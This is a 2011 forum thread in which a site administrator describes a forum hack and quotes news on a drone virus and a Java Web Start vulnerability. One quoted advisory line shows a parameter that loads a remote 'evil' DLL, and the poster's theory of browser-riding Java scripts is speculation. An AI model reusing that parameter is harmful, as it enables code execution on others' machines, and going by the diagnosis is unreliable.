collapse

Author Topic: Internet Wars and Java Attacks  (Read 9477 times)

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #15 on: October 08, 2011, 12:12:35 AM »
Computer Virus Hits U.S. Drone Fleet



Quote
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.

The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/

 :o

So hackers are getting into Area 51's Swarm Control at Creech

THIS is a scary statement..

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

So the forums are all getting hit heavy with no one really knowing WHERE its coming from. And now today we get a report that the Military, at one of the most secret installations on the planet, with all the billions spent on equipment... have this as an answer

“We think it’s benign. But we just don’t know.”

 :o

Are you scared yet?

Remember last year?

Now remember last year?

October 26, 2010

Communication With 50 Nuke Missiles Dropped in ICBM Snafu



Quote
The Air Force swears there was no panic. But for three-quarters of an hour Saturday morning, launch control officers at F.E. Warren Air Force Base in Wyoming couldn’t reliably communicate or monitor the status of 50 Minuteman III nuclear missiles. Gulp.

Backup security and communications systems, located elsewhere on the base, allowed the intercontinental ballistic missiles to be continually monitored. But the outage is considered serious enough that the very highest rungs on the chain of command — including the President — are being briefed on the incident today.

A single hardware failure appears to have been the root cause of the disruption, which snarled communications on the network that links the five launch control centers and 50 silos of the 319th Missile Squadron. Multiple error codes were reported, including “launch facility down.”

It was a “significant disruption of service,” an Air Force official familiar with the incident tells Danger Room. But not unprecedented: “Something similar happened before at other missile fields.”

A disruption of this magnitude, however, is considered an anomaly of anomalies.

“Over the course of 300 alerts — those are 24-hour shifts in the capsule — I saw this happen to three or four missiles, maybe,” says John Noonan, a former U.S. Air Force missile launch officer who first tweeted word of the issue. “This is 50 ICBMs dropping off at once. I never heard of anything like it.”

http://www.wired.com/dangerroom/2010/10/communications-dropped-to-50-nuke-missiles-in-icbm-snafu/

Okay so the Nukes are on the same grid?  :o We are DOOMED

So back to our little problems. I just needed to add this in to show that the big boys are having the same issues... and DON'T KNOW



« Last Edit: October 08, 2011, 01:47:36 AM by zorgon »

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #16 on: October 08, 2011, 01:50:06 AM »
ellirium113

October 07, 2011, 06:16:05 PM

Author = Zorgon
Well looking at those to Google Updates
Google Update Task Machine Core
Google Update Task Machine UA
I would say I have found your new version of malware


Check this out:

http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html



This is supposed to uninstall itself when there is no Google products being used...Chrome, Google Earth, Toolbar etc.


Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #17 on: October 08, 2011, 01:52:10 AM »
Google Update Now a Scheduled Task, But Still Evil



By Scott Gilbertson

Quote
Google has released a slight revision of its Google Update software for Windows. The latest version eliminates the need for Update to run constantly in the background — one of several reasons we’ve previously labeled the software “evil” — but stops short of conforming to the best practices of software updating.

Instead of running constantly in the background, consuming resources and creating a potential security vulnerability, Google Update now runs as a scheduled task.

Google Update has also been changed to allow some control over when it runs. The default is for Update to check with Google’s servers once an hour, but if you dig into the Windows Task Scheduler you can change that interval and even disable it altogether. However, according the Google Open Source Blog, tinkering with the update interval might cause Google Update to revert to its always-on status.

“When Google Update determines that the Windows Task Scheduler or Service mechanisms are not working as expected,” says the blog, “we have added in fallback mechanisms that cause Google Update to begin running as a continuous process again.”

So much for user control.

You might wonder what all the fuss is about. After all, what’s wrong with keeping your software up to date? Obviously, there’s nothing wrong with it, but Google’s Update software flies in the face of over 20 years of software best practices — there’s simply no need for desktop software to run update checks continuously, or even once an hour.

It’s not hard to see how Google views Update: it’s a way for it to have the constant update capabilities its web apps enjoy, but on your desktop. The problem is that while we accept that we can’t control the web, we most definitely can (and want to) control what happens on our laptops and PCs.

Or at least we could until Google decided we couldn’t.

The well-established practice of checking for updates when an application launches has been serving the industry — and some of its biggest names, like Adobe and Microsoft — well for for decades.

The latest version of Google Update is a baby-step in the right direction, but we still won’t be using Chrome, Google Earth or anything else that relies of Google Update until Google does the right thing.

The Mac version of Google update remains unchanged.

http://www.webmonkey.com/2009/07/google_update_now_a_scheduled_task__but_still_evil/

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #18 on: October 08, 2011, 03:32:27 AM »
Okay so caught up the events of the past few days...

JAVA ATTACKS

Couple days ago we got hacked big time. First by a swarm of what I assume were robots, by the speed and frequency of the attacks... But these were SMART bots... they got past chaptcha (we had a simple one at the time) REGISTERED an account and added weblinks to that account.  After the fact I set it to Admin approval and added three questions. That stopped them but I see in error logs that they are still knocking daily. It is this stopping them that IDed them as bots

so looking up a couple IP addresses that we banned  like this one that just hit now over 6 times...

31.184.238.8  at this site...   http://www.stopforumspam.com/search.php

yields over 500 aliases for that IP. You can search that site using a user name, an IP or an email

Well then yesterday we got all our users getting the redirects, false links, virus warnings etc.. all different depending on the browser used, the anti virus program etc... I posted some of the screen captures.

Called up my server to fix the issue... they found some JAVA scripts had gotten in. So we reloaded a saved database and tried again.  No help access still messed up, but stopped the alerts.

We tried getting access but would get blank pages. Russo spotted a 2 in the address and changed it to a 1 and bang he was in. So there was a script adding and subtracting numbers to the commands

We were up late trying to figure out what was going on and on one screen I saw at the bottom notifications on mouse over... "java history (-1)"  So something in the java folder was causing this.
Now I run several cleaners like CC Cleaner to get cookies etc out. I DID NOT know until last night that it doesn't clean out JAVA

At this point I didn't know that yet... we were tired so I moved the forum to a temp folder and got some sleep. Next morning I uploaded my copy of the forum to the server... hoping that would get me a fresh starting point... same login issues  WTF? How can that be?  fresh upload should have worked.  Server techs figured the database must be corrupt...


Then I loaded up IE ( I NEVER do that :P ) and found I could log in... but since my firefox still had me locked in, I couldn't do anything... so okay this HAS to be some hidden cookie issue but there were NONE in IE or FF cleaned them all out, etc... ran everything I had, checked my security into computer everything was fine..

Okay so no go... I then remembered the JAVA history issue and googled it;

"clearing java history"  and got right away to this PDF

How to Delete Browsing History from Java

It was from that file I got the instructions I posted at the top. Other operating systems are in the file.

I deleted the history... tried again and everything worked.  The forum was now intact (save the front portal due to database restore) Log in worked no more alerts NOTHING. Told the other admins  they cleared the history and voila  all good.

So far its been error free for over 24 hours, though the bots are hammering away.

Okay so how does all this tie together?

It SEEMS that what is happening is that a java script lurks outside the front door somehow... I am no expert, just an observer. It then SEEMS to attach itself to a user logging in to a forum. So you go visit say ATS and this script sticks to your browser like a burr... then you visit other forums and it hitch hikes.

So YOU the user thinks the forum you are visiting is giving you a virus, redirect or other alert... and the forum owners can't find it (one found one is an ad  coincidence I think) Well they can't find it because its not INSIDE, its lurking when you log in, especially with IE users.

And the forum owners are saying 'Its not us... its your browser doing it. Well in a sense that is true. It is coming via the browser, by a parasite riding along.

So conspiracy people will get all up in arms, blame the operators, blame the PTB, the three letter clubs etc. But then I see that report that Area 51 Swarm Control is having the SAME nuisance attacks and false positives... and THEY don't know what is going on... then I know its not the PTB doing this.

If I could reach them ( I will try) I would suggest they look at the JAVA issue, because even the secret servers and networks operate using JAVA. I cannot say for sure that their problem is the same, but if I were them I would look at that.

Once I cleaned the JAVA history... my PC and the forum are moving faster  a LOT faster. I had a lag before... its now gone... was likely the cookies in the browser doing it. I don't know but can see the results
« Last Edit: October 08, 2011, 03:47:37 AM by zorgon »

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #19 on: October 08, 2011, 03:54:27 AM »
So then we looked back on the web for JAVA issues and BTS found this

Serious New Java Flaw Affects All Current Versions of Windows

April 9, 2010, 9:37AM

Quote
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years.

Quote
In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw.

"Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiosly also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory.

Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable.

Serious New Java Flaw Affects All Current Versions of Windows

JavaWS and Javaws.exe



Quote
In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch.

"The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said.

The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory. Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit.

Julien Tinnes has more information about this class of Java vulnerability.

Javocalypse

Quote
EDIT: Following its full disclosure Sun fixed Tavis' Java deployment toolkit bug (CVE-2010-0886 and CVE-2010-0887) in a matter of days, wow! No doubts this will be used in the future as an argument for full disclosure.
However, this does not bring much security! An attacker can still automatically downgrade your version of Java (using installJRE) and exploit this bug or any other he likes!

Almost one year ago, I blogged about one of my favorite security bug, found by Sami Koivu.

More specifically, I blogged about a class of Java bugs exposed by Sami Koivu and I mentioned this was the first instance of it.


So I repeat... CLEAN OUT YOUR JAVA HISTORY NOW


« Last Edit: October 08, 2011, 05:15:50 AM by zorgon »

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #20 on: October 08, 2011, 03:58:12 AM »
The previous information has been provide by a lot of blood and sweat..

If you find any of it useful to save your butt, please donate to the cause...

as soon as I figure out how to put the dang Buttons back in  :P

 ::)

 8)

Stay tuned for addition updates. I don't know yet if we are out of hot water but my server team is working on beefing up security (they better be for what they charge :P )


PS To any spooks listening in... please relay this to the appropriate commands and have them check for this
« Last Edit: October 08, 2011, 05:21:13 AM by zorgon »

Offline Dood

  • Pegasus Alternate Energy Team
  • Regular Members
  • *****
  • Posts: 85
  • Gold 2
Re: Internet Wars and Java Attacks
« Reply #21 on: October 08, 2011, 04:38:51 AM »
I cleaned out mine.  Not all difficult either...

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #22 on: October 08, 2011, 04:58:21 AM »
Great to see you made it in. I was watching the error logs and saw your repeated attempts using a history file. Figured I better email you :D

Now I can get some sleep... its been quiet for over 24 hours and the bots are still pounding at the door. So I will save another backup now and get some rest

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #23 on: October 08, 2011, 02:45:18 PM »
Update: Reply from ATS

This really, REALLY sounds like something picked up via an email or blackhat site that waits until you try to log into another site (any log in could trigger it) and launches a key-logger in the hope of getting log in information.

Usually all these type are really interested in is financial account log ins.

Thanks for the heads up, I'm letting Bill know just in case.

mark...

 


Wal-Mart.com USA, LLC
affiliate_link
Free Click Tracking
Wal-Mart.com USA, LLC

* Recent Posts

Re: Mark Hamill is left stunned by new Star Wars - The Last Jedi by thorfourwinds
[January 23, 2018, 07:46:49 PM]


Re: Mark Hamill is left stunned by new Star Wars - The Last Jedi by petrus4
[January 23, 2018, 04:28:31 PM]


‘Massive object HUNDREDS of miles long’ spotted on NASA live feed before was cut by rdunk
[January 23, 2018, 03:20:23 PM]


Re: 411 by ArMaP
[January 23, 2018, 02:22:47 PM]


Re: 411 by ArMaP
[January 23, 2018, 02:08:00 PM]


Re: 411 by Gigas
[January 23, 2018, 12:39:05 PM]


Re: 411 by Irene
[January 23, 2018, 12:01:21 PM]


Re: By the stars, John Lear makes a headline on Rense by Gigas
[January 23, 2018, 11:57:08 AM]


Re: Mark Hamill is left stunned by new Star Wars - The Last Jedi by Irene
[January 23, 2018, 11:52:34 AM]


Re: 411 by Gigas
[January 23, 2018, 11:36:55 AM]


Re: By the stars, John Lear makes a headline on Rense by zorgon
[January 23, 2018, 11:30:57 AM]


Re: 411 by Irene
[January 23, 2018, 10:11:52 AM]


Re: 411 by Irene
[January 23, 2018, 10:03:10 AM]


Re: 411 by Irene
[January 23, 2018, 10:02:14 AM]


Re: The X Files series by micjer
[January 23, 2018, 06:32:49 AM]


Re: 411 by ArMaP
[January 23, 2018, 05:33:17 AM]


Re: 411 by ArMaP
[January 23, 2018, 05:32:17 AM]


Re: By the stars, John Lear makes a headline on Rense by ArMaP
[January 23, 2018, 02:18:27 AM]


Mark Hamill is left stunned by new Star Wars - The Last Jedi by A51Watcher
[January 23, 2018, 02:15:59 AM]


Re: 411 by Gigas
[January 22, 2018, 11:17:13 PM]

affiliate_link